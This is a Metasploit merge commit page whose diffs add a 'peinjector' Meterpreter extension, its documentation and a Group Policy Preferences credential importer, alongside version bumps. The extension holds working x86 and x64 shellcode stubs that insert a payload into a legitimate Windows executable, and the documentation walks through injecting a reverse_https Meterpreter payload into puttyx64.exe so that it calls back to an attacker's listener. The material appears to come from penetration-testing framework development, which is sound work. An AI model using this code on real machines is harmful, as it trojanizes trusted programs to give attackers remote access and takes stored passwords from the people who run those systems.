merge changes

GSoC/Meterpreter_Web_Console
Christian Mehlmauer 2018-08-29 06:09:40 +02:00
commit 14fa41a376
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
17 changed files with 735 additions and 44 deletions

View File

@ -18,7 +18,7 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.3.43) metasploit-payloads (= 1.3.44)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.4.1) metasploit_payloads-mettle (= 0.4.1)
mqtt mqtt
@ -164,7 +164,7 @@ GEM
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.3.43) metasploit-payloads (1.3.44)
metasploit_data_models (3.0.0) metasploit_data_models (3.0.0)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)

View File

@ -7211,7 +7211,7 @@
], ],
"description": "Claymores Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", "description": "Claymores Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.",
"references": [ "references": [
"CVE-CVE-2018-6317", "CVE-2018-6317",
"URL-https://www.exploit-db.com/exploits/43972/", "URL-https://www.exploit-db.com/exploits/43972/",
"URL-https://github.com/nanopool/Claymore-Dual-Miner" "URL-https://github.com/nanopool/Claymore-Dual-Miner"
], ],
@ -7221,7 +7221,7 @@
"arch": "", "arch": "",
"rport": 3333, "rport": 3333,
"targets": null, "targets": null,
"mod_time": "2018-02-16 16:17:52 +0000", "mod_time": "2018-08-28 13:34:02 +0000",
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py", "path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
"is_install_path": true, "is_install_path": true,
"ref_name": "dos/tcp/claymore_dos", "ref_name": "dos/tcp/claymore_dos",
@ -46101,11 +46101,13 @@
"rport": 8080, "rport": 8080,
"targets": [ "targets": [
"Unix (In-Memory)", "Unix (In-Memory)",
"Windows (In-Memory)",
"Python (In-Memory)", "Python (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)", "Linux (Dropper)",
"Windows (Dropper)" "Windows (Dropper)"
], ],
"mod_time": "2017-09-08 13:59:29 +0000", "mod_time": "2018-08-28 15:56:45 +0000",
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb", "path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
"is_install_path": true, "is_install_path": true,
"ref_name": "multi/http/struts2_rest_xstream", "ref_name": "multi/http/struts2_rest_xstream",
@ -114528,6 +114530,33 @@
"post_auth": false, "post_auth": false,
"default_credential": false "default_credential": false
}, },
"post_windows/manage/peinjector": {
"name": "Peinjector",
"full_name": "post/windows/manage/peinjector",
"rank": 300,
"disclosure_date": null,
"type": "post",
"author": [
"Maximiliano Tedesco <maxitedesco1@gmail.com>"
],
"description": "This module will inject a specified windows payload into a target executable.",
"references": [
],
"is_server": false,
"is_client": false,
"platform": "Windows",
"arch": "",
"rport": null,
"targets": null,
"mod_time": "2018-08-28 11:33:17 +0000",
"path": "/modules/post/windows/manage/peinjector.rb",
"is_install_path": true,
"ref_name": "windows/manage/peinjector",
"check": false,
"post_auth": false,
"default_credential": false
},
"post_windows/manage/persistence_exe": { "post_windows/manage/persistence_exe": {
"name": "Windows Manage Persistent EXE Payload Installer", "name": "Windows Manage Persistent EXE Payload Installer",
"full_name": "post/windows/manage/persistence_exe", "full_name": "post/windows/manage/persistence_exe",

View File

@ -0,0 +1,98 @@
## Overview
This module inserts a payload into an existing PE file on a remote
machine. When a user launches the binary, the payload will run
as a thread within the process with the same privs.
## Module Options
LHOST IP of host that will receive the connection from the payload.
LPORT Port for Payload to connect to.
OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD Windows Payload to inject into the targer executable.
SESSION The session to run this module on.
TARGETPE Path of the target executable to Path of the target executable to be injected
## Limitations
This process is not reverse-able. If you would like to return the
binary to it's original state, save a copy.
THE PAYLOAD WILL NOT SPAWN AN INDEPENDENT PROCESS/THREAD AND THE SESSION
WILL DIE WITH THE BINARY AND/OR WILL KILL THE BINARY WHEN THE SESSION
EXITS. Be careful closing sessions that were spawned using this method!
If a setting is wrong, it may cause the binary to fail to launch,
alerting the user to possible shinnanigans.
## Vulnerable Applications
`Vulnerable` is a bad term; this module inserts shellcode into a pe
file. That means any Windows pe files are `vulnerable`.
Be aware that some files like calc.exe on later Windows versions
are not entirely normal in their behvior and are not `vulnerable`
## Verification steps
* get session on target
* `use post/windows/manage/peinjector`
* `set payload <payload>`
* `set lport <lport>`
* `set lhost <lhost>`
* `set targetpe <*.exe>`
* `run`
## Usage
```
meterpreter > sysinfo
Computer : WIN10X64-1511
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use post/windows/manage/peinjector
msf5 post(windows/manage/peinjector) > show options
Module options (post/windows/manage/peinjector):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
SESSION yes The session to run this module on.
TARGETPE no Path of the target executable to be injected
msf5 post(windows/manage/peinjector) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 post(windows/manage/peinjector) > set lport 4561
lport => 4561
msf5 post(windows/manage/peinjector) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf5 post(windows/manage/peinjector) > set session 1
session => 1
msf5 post(windows/manage/peinjector) > set targetpe 'C:\users\msfuser\downloads\puttyx64.exe'
targetpe => C:\users\msfuser\downloads\puttyx64.exe
msf5 post(windows/manage/peinjector) > show options
Module options (post/windows/manage/peinjector):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.135.111 yes IP of host that will receive the connection from the payload.
LPORT 4561 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/x64/meterpreter/reverse_https no Windows Payload to inject into the targer executable.
SESSION 1 yes The session to run this module on.
TARGETPE C:\users\msfuser\downloads\puttyx64.exe no Path of the target executable to be injected
msf5 post(windows/manage/peinjector) > run
[*] Running module against WIN10X64-1511
[*] Generating payload
[*] Injecting Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet) into the executable C:\users\msfuser\downloads\puttyx64.exe
[+] Successfully injected payload into the executable: C:\users\msfuser\downloads\puttyx64.exe
[*] Post module execution completed
msf5 post(windows/manage/peinjector) >
```

View File

@ -21,6 +21,7 @@ module Msf::DBManager::Import
autoload :CI, 'msf/core/db_manager/import/ci' autoload :CI, 'msf/core/db_manager/import/ci'
autoload :Foundstone, 'msf/core/db_manager/import/foundstone' autoload :Foundstone, 'msf/core/db_manager/import/foundstone'
autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm' autoload :FusionVM, 'msf/core/db_manager/import/fusion_vm'
autoload :GPP, 'msf/core/db_manager/import/gpp'
autoload :IP360, 'msf/core/db_manager/import/ip360' autoload :IP360, 'msf/core/db_manager/import/ip360'
autoload :IPList, 'msf/core/db_manager/import/ip_list' autoload :IPList, 'msf/core/db_manager/import/ip_list'
autoload :Libpcap, 'msf/core/db_manager/import/libpcap' autoload :Libpcap, 'msf/core/db_manager/import/libpcap'
@ -47,6 +48,7 @@ module Msf::DBManager::Import
include Msf::DBManager::Import::CI include Msf::DBManager::Import::CI
include Msf::DBManager::Import::Foundstone include Msf::DBManager::Import::Foundstone
include Msf::DBManager::Import::FusionVM include Msf::DBManager::Import::FusionVM
include Msf::DBManager::Import::GPP
include Msf::DBManager::Import::IP360 include Msf::DBManager::Import::IP360
include Msf::DBManager::Import::IPList include Msf::DBManager::Import::IPList
include Msf::DBManager::Import::Libpcap include Msf::DBManager::Import::Libpcap
@ -164,6 +166,7 @@ module Msf::DBManager::Import
# :ci_xml # :ci_xml
# :foundstone_xml # :foundstone_xml
# :fusionvm_xml # :fusionvm_xml
# :gpp_xml
# :ip360_aspl_xml # :ip360_aspl_xml
# :ip360_xml_v3 # :ip360_xml_v3
# :ip_list # :ip_list
@ -358,6 +361,9 @@ module Msf::DBManager::Import
when "main" when "main"
@import_filedata[:type] = "Outpost24 XML" @import_filedata[:type] = "Outpost24 XML"
return :outpost24_xml return :outpost24_xml
when /Groups|DataSources|Drives|ScheduledTasks|NTServices/
@import_filedata[:type] = "Group Policy Preferences Credentials"
return :gpp_xml
else else
# Give up if we haven't hit the root tag in the first few lines # Give up if we haven't hit the root tag in the first few lines
break if line_count > 10 break if line_count > 10

View File

@ -0,0 +1,41 @@
require 'rex/parser/group_policy_preferences'
module Msf::DBManager::Import::GPP
def import_gpp_xml(args = {}, &block)
return unless args && args[:data] && !args[:data].empty?
gpp = Rex::Parser::GPP.parse(args[:data])
return unless gpp && gpp.any?
wspace = find_workspace(args[:workspace])
return unless wspace && wspace.respond_to?(:id)
gpp.each do |p|
# Skip incomplete creds
next unless p[:USER] && p[:PASS]
# Store decrypted creds
create_credential(
workspace_id: wspace.id,
origin_type: :import,
filename: args[:filename],
username: p[:USER],
private_data: p[:PASS],
private_type: :password
)
end
# Store entire file as loot, including metadata
report_loot(
workspace: wspace,
path: args[:filename],
name: File.basename(args[:filename]),
data: args[:data],
type: 'microsoft.windows.gpp',
ctype: 'text/xml',
info: gpp
)
end
end

View File

@ -1493,6 +1493,7 @@ public
# * :ci_xml # * :ci_xml
# * :foundstone_xml # * :foundstone_xml
# * :fusionvm_xml # * :fusionvm_xml
# * :gpp_xml
# * :ip360_aspl_xml # * :ip360_aspl_xml
# * :ip360_xml_v3 # * :ip360_xml_v3
# * :ip_list # * :ip_list

View File

@ -1428,6 +1428,7 @@ class Db
print_line " CI" print_line " CI"
print_line " Foundstone" print_line " Foundstone"
print_line " FusionVM XML" print_line " FusionVM XML"
print_line " Group Policy Preferences Credentials"
print_line " IP Address List" print_line " IP Address List"
print_line " IP360 ASPL" print_line " IP360 ASPL"
print_line " IP360 XML v3" print_line " IP360 XML v3"

View File

@ -0,0 +1,247 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/peinjector/tlv'
module Rex
module Post
module Meterpreter
module Extensions
module Peinjector
###
#
# This meterpreter extensions allow to inject a given shellcode into an executable file.
#
###
class Peinjector < Extension
def initialize(client)
super(client, 'peinjector')
client.register_extension_aliases(
[
{
'name' => 'peinjector',
'ext' => self
}
])
end
def inject_shellcode(opts = {})
return nil unless opts[:shellcode]
request = Packet.create_request('peinjector_inject_shellcode')
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size])
request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64])
request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe])
response = client.send_request(request)
error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
raise error_msg if error_msg
return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT)
end
def add_thread_x86(payload)
stackpreserve = "\x90\x90\x60\x9c" # AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd']
shellcode = "\xE8\xB7\xFF\xFF\xFF" # AUTOMATED ASM: x86 = ['call 0xffffffbc']
shellcode += payload
thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" + # AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid']
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" + # AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid']
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + # AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61']
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" + # AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 'ror edi, 0xd', 'add edi, eax', 'dec ecx', 'jnz 0xfffffffb', 'push edx', 'nop', 'push edi', 'invalid']
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48" + # AUTOMATED ASM: x86 = ['push edx', 'adc [eax+0x13c428b], dl', 'rcl byte [eax-0x1487bf75], 1', 'pop es', 'invalid']
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0" + # AUTOMATED ASM: x86 = ['inc edx', 'add al, 0x85', 'jl 0x3f', 'test eax, eax', 'jz 0x75', 'nop', 'add eax, edx']
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B" + # AUTOMATED ASM: x86 = ['push eax', 'nop', 'mov ecx, [eax+0x18]', 'mov ebx, [eax+0x20]', 'add ebx, edx', 'jecxz 0x64', 'dec ecx', 'mov esi, [ebx+ecx*4]']
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF" + # AUTOMATED ASM: x86 = ['add esi, edx', 'xor edi, edi', 'nop', 'xor eax, eax', 'jmp 0xd', 'jmp far dword [ecx-0x2b]', 'invalid']
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D" + # AUTOMATED ASM: x86 = ['or eax, 0xe038c701', 'jmp 0xc', 'jg 0x24', 'shr bl, cl', 'retf 0xe675', 'invalid']
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B" + # AUTOMATED ASM: x86 = ['clc', 'cmp edi, [ebp+0x24]', 'jnz 0xffffffda', 'pop eax', 'nop', 'mov ebx, [eax+0x24]', 'add ebx, edx', 'nop', 'invalid']
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04" + # AUTOMATED ASM: x86 = ['or al, 0x4b', 'mov ebx, [eax+0x1c]', 'add ebx, edx', 'nop', 'jmp 0xe', 'int 0x97', 'int1', 'mov cl, 0x8b', 'invalid']
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB" + # AUTOMATED ASM: x86 = ['mov eax, [ecx]', 'rcl byte [eax+0x24244489], 1', 'pop ebx', 'pop ebx', 'popad', 'nop', 'pop ecx', 'pop edx', 'push ecx', 'invalid']
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90" + # AUTOMATED ASM: x86 = ['add [edi], ecx', 'jmp eax', 'pop eax', 'nop', 'pop edi', 'pop edx', 'mov edx, [edx]', 'jmp 0xffffff62', 'nop']
"\x5D\x90" + # AUTOMATED ASM: x86 = ['pop ebp', 'nop'] x64 = ['pop rbp', 'nop']
"\xBE" # AUTOMATED ASM: x86 = ['invalid'] x64 = ['invalid']
thread +=[shellcode.length - 5].pack("V")
thread += "\x90\x6A\x40\x90\x68\x00\x10\x00\x00" + # AUTOMATED ASM: x86 = ['nop', 'push 0x40', 'nop', 'push 0x1000']
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90" + # AUTOMATED ASM: x86 = ['push esi', 'nop', 'push 0x0', 'push 0xe553a458', 'call ebp', 'mov ebx, eax', 'mov edi, eax', 'nop']
"\x89\xF1" # AUTOMATED ASM: x86 = ['mov ecx, esi'] x64 = ['mov ecx, esi']
thread += "\xeb\x44" # <--length of shellcode below # AUTOMATED ASM: x86 = ['jmp 0x46']
thread += "\x90\x5e" # AUTOMATED ASM: x86 = ['nop', 'pop esi']
thread += "\x90\x90\x90" + # AUTOMATED ASM: x86 = ['nop', 'nop', 'nop']
"\xF2\xA4" + # AUTOMATED ASM: x86 = ['repne movsb']
"\xE8\x20\x00\x00" + # AUTOMATED ASM: x86 = ['invalid']
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06" + # AUTOMATED ASM: x86 = ['add [ebx+0xa2a1de0], bh', 'nop', 'push 0x9dbd95a6', 'call ebp', 'cmp al, 0x6']
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF" + # AUTOMATED ASM: x86 = ['jl 0xc', 'cmp bl, 0xe0', 'jnz 0xc', 'mov ebx, 0x6f721347', 'push 0x0', 'push ebx', 'invalid']
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5" + # AUTOMATED ASM: x86 = ['aad 0x31', 'rcl byte [eax+0x50], 0x50', 'push ebx', 'push eax', 'push eax', 'push 0x160d6838', 'call ebp']
"\x58\x58\x90\x61" # AUTOMATED ASM: x86 = ['pop eax', 'pop eax', 'nop', 'popad']
thread += "\xe9" # AUTOMATED ASM: x86 = ['invalid']
thread += [shellcode.length].pack("V")
return stackpreserve + thread + shellcode
end
def add_thread_x64(payload)
stackpreserve = "\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50" + # AUTOMATED ASM: x64 = ['nop', 'push rax', 'push rbx', 'push rcx', 'push rdx', 'push rsi', 'push rdi', 'push rbp', 'push r8']
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c" # AUTOMATED ASM: x64 = ['push r9', 'push r10', 'push r11', 'push r12', 'push r13', 'push r14', 'push r15', 'pushfq']
shellcode = "\xE8\xB8\xFF\xFF\xFF" # AUTOMATED ASM: x64 = ['call 0xffffffffffffffbd']
shellcode += payload
thread = "\x90" + # <--THAT'S A NOP. \o/ # AUTOMATED ASM: x64 = ['nop']
"\xe8\xc0\x00\x00\x00" + # jmp to allocate # AUTOMATED ASM: x64 = ['call 0xc5']
# api_call
"\x41\x51" + # push r9
"\x41\x50" + # push r8
"\x52" + # push rdx
"\x51" + # push rcx
"\x56" + # push rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x65\x48\x8B\x52\x60" + # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" + # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" + # mov rdx,qword ptr[rdx+32]
# next_mod
"\x48\x8b\x72\x50" + # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" + # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" + # xor r9,r9
# loop_modname
"\x48\x31\xc0" + # xor rax,rax
"\xac" + # lodsb
"\x3c\x61" + # cmp al, 61h (a)
"\x7c\x02" + # jl 02h
"\x2c\x20" + # sub al, 0x20
# not_lowercase
"\x41\xc1\xc9\x0d" + # ror r9d, 13
"\x41\x01\xc1" + # add r9d, eax
"\xe2\xed" + # loop until read, back to xor rax, rax
"\x52" + # push rdx ;Save the current position in the module list
"\x41\x51" + # push r9 ; Save the current module hash for later
# ; Proceed to iterate the export address table,
"\x48\x8b\x52\x20" + # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" + # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" + # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" + # test rax, rax ; Test if no export address table
"\x74\x67" + # je get_next_mod1 ; If no EAT present, process the nex
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
"\x50" + # push rax ; Save the current modules EAT
"\x8b\x48\x18" + # mov ecx, dword [rax+24] ; Get the number of function
"\x44\x8b\x40\x20" + # mov r8d, dword [rax+32] ; Get the rva of the function
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
# get_next_func: ;
"\xe3\x56" + # jrcxz get_next_mod; When we reach the start of the EAT
"\x48\xff\xc9" + # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" + # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" + # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" + # xor r9, r9 ; Clear r9 which will store the hash
# ; And compare it to the one we wan
# loop_funcname: ;
"\x48\x31\xc0" + # xor rax, rax ; Clear rax
"\xac" + # lodsb ; Read in the next byte of the ASCII funct name
"\x41\xc1\xc9\x0d" + # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" + # add r9d, eax ; Add the next byte of the name
"\x38\xe0" + # cmp al, ah ; Compare AL to AH (null)
"\x75\xf1" + # jne loop_funcname ; continue
"\x4c\x03\x4c\x24\x08" + # add r9, [rsp+8] ; Add the current module hash
"\x45\x39\xd1" + # cmp r9d, r10d ; Compare the hash
"\x75\xd8" + # jnz get_next_func ; Go compute the next function hash
"\x58" + # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" + # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" + # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" + # mov r8d, dword [rax+28] ; Get the funct addr table rva
"\x49\x01\xd0" + # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" + # mov eax, dword [r8+4*rcx]; Get the desired func RVA
"\x48\x01\xd0" + # add rax, rdx ; Add the modules base address
# finish:
"\x41\x58" + # pop r8 ; Clear off the current modules hash
"\x41\x58" + # pop r8 ;Clear off the curr position in the module list
"\x5E" + # pop rsi ; Restore RSI
"\x59" + # pop rcx ; Restore the 1st parameter
"\x5A" + # pop rdx ; Restore the 2nd parameter
"\x41\x58" + # pop r8 ; Restore the 3rd parameter
"\x41\x59" + # pop r9 ; Restore the 4th parameter
"\x41\x5A" + # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" + # sub rsp, 32 ; reserve space for the register params
"\x41\x52" + # push r10 ; push back the return address
"\xFF\xE0" + # jmp rax ; Jump into the required function
# get_next_mod: ;
"\x58" + # pop rax ; Pop off the current modules EAT
# get_next_mod1: ;
"\x41\x59" + # pop r9 ; Pop off the current modules hash
"\x5A" + # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" + # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
# allocate
thread += "\x5d" + # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload... # AUTOMATED ASM: x64 = ['invalid']
thread += [shellcode.length - 5].pack("V")
thread += "\x6a\x40" + # push 40h
"\x41\x59" + # pop r9 now 40h
"\x68\x00\x10\x00\x00" + # push 1000h
"\x41\x58" + # pop r8.. now 1000h
"\x4C\x89\xF2" + # mov rdx, r14
"\x6A\x00" + # push 0
"\x59" + # pop rcx
"\x68\x58\xa4\x53\xe5" + # push E553a458
"\x41\x5A" + # pop r10
"\xff\xd5" + # call rbp
"\x48\x89\xc3" + # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
thread += "\x48\xc7\xc1" # AUTOMATED ASM: x86 = ['dec eax', 'invalid'] x64 = ['invalid']
thread += [shellcode.length - 5].pack("V")
thread += "\xeb\x43" # AUTOMATED ASM: x86 = ['jmp 0x45'] x64 = ['jmp 0x45']
# got_payload:
thread += "\x5e" + # pop rsi ; Prepare ESI with the source
"\xf2\xa4" + # repne movsb ; Copy the payload to RWX memo
"\xe8\x00\x00\x00\x00" + # call set_handler ; Configure error handling
# set_handler:
"\x48\x31\xC0" + # xor rax,rax
"\x50" + # push rax ; LPDWORD lpThreadId (NULL)
"\x50" + # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" + # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" + # mov rdx, rax ; LPTHREAD_START_ROUTINE (payload)
"\x49\x89\xD8" + # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" + # mov rcx, rax ; LPSECURITY_ATTRIBUTES (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" + # mov r10, 0x160D6838 ; hash("kernel32.dll","CreateThread")
"\xFF\xD5" + # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" + # add rsp, 50
# stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59" + # AUTOMATED ASM: x64 = ['popfq', 'pop r15', 'pop r14', 'pop r13', 'pop r12', 'pop r11', 'pop r10', 'pop r9']
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58" # AUTOMATED ASM: x64 = ['pop r8', 'pop rbp', 'pop rsp', 'pop rdi', 'pop rsi', 'pop rdx', 'pop rcx', 'pop rbx', 'pop rax']
thread += "\xe9" # AUTOMATED ASM: x64 = ['invalid']
thread += [shellcode.length].pack("V")
return stackpreserve + thread + shellcode
end
end
end
end
end
end
end

View File

@ -0,0 +1,19 @@
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Peinjector
TLV_TYPE_PEINJECTOR_SHELLCODE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1)
TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64 = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 3)
TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
TLV_TYPE_PEINJECTOR_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5)
end
end
end
end
end

View File

@ -0,0 +1,135 @@
# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
module Post
module Meterpreter
module Ui
###
#
# Peinjector extension - inject a given shellcode into an executable file
#
###
class Console::CommandDispatcher::Peinjector
Klass = Console::CommandDispatcher::Peinjector
include Console::CommandDispatcher
#
# Name for this dispatcher
#
def name
'Peinjector'
end
#
# List of supported commands.
#
def commands
{
'injectpe' => 'Inject a shellcode into a given executable'
}
end
@@injectpe_opts = Rex::Parser::Arguments.new(
'-p' => [true, 'Windows Payload to inject into the targer executable.'],
'-t' => [true, 'Path of the target executable to be injected'],
'-o' => [true, 'Comma separated list of additional options for payload if needed in \'opt1=val,opt2=val\' format.'],
'-h' => [false, 'Help banner']
)
def injectpe_usage
print_line('Usage: injectpe -p < windows/meterpreter/reverse_https > -t < c:\target_file.exe >, -o < lhost=192.168.1.123, lport=4443 >')
print_line
print_line('Inject a shellcode on the target executable.')
print_line(@@injectpe_opts.usage)
end
#
# Inject a given shellcode into a remote executable
#
def cmd_injectpe(*args)
if args.length == 0 || args.include?('-h')
injectpe_usage
return false
end
opts = {
payload: nil,
targetpe: nil,
options: nil
}
@@injectpe_opts.parse(args) { |opt, idx, val|
case opt
when '-p'
opts[:payload] = val
when '-t'
opts[:targetpe] = val
when '-o'
opts[:options] = val
end
}
payload = create_payload(opts[:payload], opts[:options])
inject_payload(payload, opts[:targetpe])
end
# Create a payload given a name, lhost and lport, additional options
def create_payload(name, opts = "")
pay = client.framework.payloads.create(name)
pay.datastore['EXITFUNC'] = 'thread'
pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler
if not opts.blank?
opts.split(",").each do |o|
opt,val = o.split("=",2)
pay.datastore[opt] = val
end
end
# Validate the options for the module
pay.options.validate(pay.datastore)
return pay
end
def inject_payload(pay, targetpe)
begin
print_status("Generating payload")
raw = pay.generate
param = {}
if pay.arch.join == ARCH_X64
threaded_shellcode = client.peinjector.add_thread_x64(raw)
param[:isx64] = true
else
threaded_shellcode = client.peinjector.add_thread_x86(raw)
param[:isx64] = false
end
param[:shellcode] = threaded_shellcode
param[:targetpe] = targetpe
param[:size] = threaded_shellcode.length;
print_status("Injecting #{pay.name} into the executable #{targetpe}")
client.peinjector.inject_shellcode(param)
print_good("Successfully injected payload into the executable: #{targetpe}")
rescue ::Exception => e
print_error("Failed to Inject Payload to executable #{targetpe}!")
print_error(e.to_s)
end
end
end
end
end
end
end

View File

@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database # are needed when there's no database
spec.add_runtime_dependency 'metasploit-model' spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter # Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.43' spec.add_runtime_dependency 'metasploit-payloads', '1.3.45'
# Needed for the next-generation POSIX Meterpreter # Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1' spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.4.1'
# Needed by msfgui and other rpc components # Needed by msfgui and other rpc components

View File

@ -25,7 +25,7 @@ metadata = {
'date': '2018-02-06', 'date': '2018-02-06',
'references': [ 'references': [
